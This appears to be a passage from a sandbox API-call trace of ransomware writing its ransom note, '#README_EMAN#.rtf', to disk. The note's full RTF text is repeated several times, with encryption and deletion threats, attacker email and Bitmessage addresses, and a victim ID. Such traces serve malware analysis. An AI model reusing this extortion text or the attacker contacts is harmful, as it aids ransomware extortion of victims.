definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0208.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n0>5\x1d:\x1b\x1b\x0f\x0f.%\"'$\x12\x12&'%$\x0f\x1bC3\n", lpUsedDefaultChar=0x0) returned 8717 [0208.107] WriteFile (in: hFile=0x2fc, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0208.108] CloseHandle (hObject=0x2fc) returned 1 [0208.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\#readme_eman#.rtf")) returned 0xffffffff [0208.108] GetLastError () returned 0x2 [0208.108] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2fc [0208.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n 